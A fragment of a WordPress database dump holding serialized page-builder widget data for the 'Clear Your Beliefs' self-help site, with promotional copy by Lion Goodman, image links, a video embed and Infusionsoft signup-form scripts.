[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1226, 1699, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -15px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1227, 1700, '_wp_attached_file', '2014/10/IClearIt-website_sml.png'),
(1228, 1700, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:667;s:6:"height";i:300;s:4:"file";s:32:"2014/10/IClearIt-website_sml.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"IClearIt-website_sml-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:32:"IClearIt-website_sml-300x134.png";s:5:"width";i:300;s:6:"height";i:134;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:32:"IClearIt-website_sml-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:32:"IClearIt-website_sml-400x300.png";s:5:"width";i:400;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:32:"IClearIt-website_sml-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1229, 1701, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -45px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1230, 1702, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> 